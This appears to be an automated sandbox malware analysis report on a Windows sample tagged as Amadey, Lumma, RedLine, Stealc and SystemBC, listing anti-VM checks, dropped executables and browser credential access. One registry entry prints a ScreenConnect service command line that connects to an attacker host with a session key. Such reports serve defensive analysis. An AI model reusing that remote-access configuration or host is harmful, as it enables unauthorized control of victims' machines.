Malware Analysis Report

2025-04-03 09:13

Sample ID 250227-e3sdsavxet
Target daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe
SHA256 daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30
Tags
amadey gcleaner lumma redline stealc systembc 092155 a4d2cd reno testproliv credential_access defense_evasion discovery execution infostealer loader persistence privilege_escalation spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30

Threat Level: Known bad

The file daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe was found to be: Known bad.

Malicious Activity Summary

amadey gcleaner lumma redline stealc systembc 092155 a4d2cd reno testproliv credential_access defense_evasion discovery execution infostealer loader persistence privilege_escalation spyware stealer trojan

Stealc

Gcleaner family

Stealc family

RedLine payload

Systembc family

Amadey

GCleaner

Amadey family

Redline family

RedLine

SystemBC

Lumma Stealer, LummaC

Lumma family

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Uses browser remote debugging

Blocklisted process makes network request

Sets service image path in registry

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Checks BIOS information in registry

Unsecured Credentials: Credentials In Files

Event Triggered Execution: Component Object Model Hijacking

Loads dropped DLL

Checks computer location settings

Identifies Wine through registry keys

Reads data files stored by FTP clients

Reads user/profile data of web browsers

Reads user/profile data of local email clients

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Enumerates connected drives

Suspicious use of SetThreadContext

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

AutoIT Executable

Boot or Logon Autostart Execution: Authentication Package

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Program crash

Browser Information Discovery

System Location Discovery: System Language Discovery

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Modifies data under HKEY_USERS

Enumerates system info in registry

Modifies registry class

Checks processor information in registry

Delays execution with timeout.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Scheduled Task/Job: Scheduled Task

Suspicious use of FindShellTrayWindow

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-02-27 04:28

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-02-27 04:28

Reported

2025-02-27 04:30

Platform

win10v2004-20250217-en

Max time kernel

150s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\cxqswdu\bsnjgb.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10038780101\bce8c2f94e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10038790101\45ab6d7c71.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10038800101\edad866f30.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10000300101\systemdrive.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (3be09d9e5e840c20)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=bbcnas2.zapto.org&p=8041&s=feb3dc3c-6578-4232-a238-57d465576d77&k=BgIAAACkAABSU0ExAAgAAAEAAQBdpn0O4B1VqMLUD0QDsNyYTlq4tRTm9ACUnnSMesFZALDh%2bLgBUwyTJ9D684SXejMRZmxv0Ws0vI2HDF%2f3pgx%2bIGwSyAZ%2fcl0w71rKbKyIIKYDZKbnkGgXvWGAi3ZyQp5OOPPQACb3KOn3dbHGC7zVR4YxQG18q4ph%2fyqoczab4g1p0ctN9m9IinVuQ4spX2nQNInOfCqxjvWdinItao7pk9fPOEV6qP3zSVfOwlnLHbRaASXeN%2fudvdB8e5o68h%2bjKG6VwXtszNJDCo7VtQqZmoYLmAVq9dmcJjckjVt0p%2bJPysj6usBrEV3AzT%2ff7W%2bYHYQ0svZBekSGOWFY8kLf&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAdNc1f3CvCkKagIbJ43rU7AAAAAACAAAAAAAQZgAAAAEAACAAAACr%2fqzTNBj8qwzcgMtuVTCpQG4UNnYIAowV6qEksW31QAAAAAAOgAAAAAIAACAAAABPHGKCCMU4X5WLFLB%2fw06I9JgJM92Abo1NPQ68XuXraqAEAACbHuUJBH52EL1rYDM9dNzsFL0n%2fryFB4OOTcaG48Uq5FNNppU4H9UoC9mD3UYNwj%2fH75ddUdvfQqlQHHIC%2bC1sZe72HCmYpRToWbm2HhVhVX%2fgP0dnAtEUODnxrT99oH5F017wJr%2fJ7aSQWwjBqw0%2fX6r1dqs9Ty8lN1cMplSEekEQ50CqEgvVSkjV6gDR2oiLqbZwKUbqxzYTsUyLcveqZZJX61wcI5KfS9nKJdCCP05UrNKNIh2BzNrzJnRpPwjLWcNHdV4Ot%2b4JvSeMHRlGxRQmP5bnfZQx6pX9JJCpmfk6Pua1eVAwIQ0SvSXa%2fxpznlezMzDvk3XlkhuasiXRbEboSw619KVzPmvd24SKr306KfQWVEXn3dUAjssmPYOUTO0ojsMcgjiEDVvnueeQdlkkdNzRd%2bOaTMyHZwWBW7wiRJDLRrH3JnKJ8C2cg%2freY7H%2faH3pAuPHsVjwPDL%2bbjxNNyg6%2fCq4Y%2fUoTO84lvECwbPmXfEZE8ivzM9WmS%2fkT5ChZE%2fzl3NBwPVSfSo5u6vFzqJoXIaNVoYYTwJOv3M%2f59ZQoEtYmC2kHfbeprHxcReDITNmkB%2f71rseFY0pc%2fKQ7Sb8%2byj%2bM6MJqbTTiWzUjqyV2qy0Hwab8dvjpffPy8T14S9hMvTFHkfngv1%2bzV4tAT3D5k5d9Yo8WOWQCqOcClRZlloXLdDOldARLMQJ%2fnzEg1vIMF5bZWHjxBkKP5OVKqe0hejkGYpqWWfWJ9Wme1cnmKbShSnmm6KaNa3e9mNzBwIrpyFc6%2fLb2NU%2fa6oORIB4t%2b9tWrafFKmRupGKYWQyTX%2fQMXaZlyzC%2bVtb5ZgofgC50mUYnBmYDPa2wt8H7RtnsVhPinTSC5Pa3wJLgTMWUzID90vaZLcdNhwl23zcUm6KCNVaGSwk5%2bTPI7BOYuUmHirLaK2CitcaB36raZNmL6nPGOFb00WheI3XzY0LI1tkHzRSSvEU0CO0Cn1Fdc5ABjJ0UKOQYivD8BTYqutc4%2b1ceCvCcBcQ1X4q1V1Q1KOmPR3MNLhtZaD1fT93gbYyE21UZ41Z5jXTHfTdsNiWFAS7WOwzBDrUimv2DixG4QwJCXpGe%2bCRfwiP1y6s%2bwvhNNNbtw0D0eIvGzHLtHZ7UgbkuoASNYc2oR0%2fCbOzTJN4LUD%2by5z85XyL6j8fwMtMQjpfdBthc%2foq0tyRcrWybdVEVhuiisU6HahSUEAiS0WUC9ObARWOXe%2f28VwOtOHXFwoSy%2fckXKy3kEqX6sFF2pMqZQm8f2HUrbRR%2bSqGLmRZmFyNX2WmivWmurkMLTzoQv1lQytIni25ZUrIfPiY00EAlV9JjIEzdpZaUj6aLzAv%2fFtoN%2bWEj1KiB389lmsf4oEJpoKKv9eEk81nTsmsUwbYNqmrcJm8fJssPWNntvNvROD1XPwGTO7c%2b9qicVwtgAwVbcquJdhQqSf50jU7s6f18n%2bnq7fCyHXRgi3FnHnwTKF8iuBpZClahu06gj6pAozEAy%2bRPDqo1NbCgMsqHAi6FyT3kCAAzmj%2flxgAF4NuXFlx%2fP9zi1xwVnUVF6IRGDJNLODH%2ff8MgEAAAAA0zgnI1A0meAuUcEYkhiNiSNLPHVgQi31%2fOuIbVJ5q8So8%2fYH9EHoTaM0SpRvSEcHkJZJQBEOe%2bDYnNj9XJEbM&c=test&c=&c=&c=&c=&c=&c=&c=\"" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A

Uses browser remote debugging

credential_access stealer
Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10038780101\bce8c2f94e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\cxqswdu\bsnjgb.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10038790101\45ab6d7c71.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10038800101\edad866f30.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10000300101\systemdrive.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10000300101\systemdrive.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\cxqswdu\bsnjgb.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10038790101\45ab6d7c71.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10038800101\edad866f30.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10038780101\bce8c2f94e.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10038810101\67e0HNq.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038760101\82ca9ecab5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\systemdrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp0PZJULHHMQK22YB4KVAH3HBPL4NYETMR.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\ProgramData\cxqswdu\bsnjgb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038780101\bce8c2f94e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038790101\45ab6d7c71.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038800101\edad866f30.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038810101\67e0HNq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038820101\VBUN8fn.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10000300101\systemdrive.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\ProgramData\cxqswdu\bsnjgb.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10038780101\bce8c2f94e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10038790101\45ab6d7c71.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10038800101\edad866f30.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
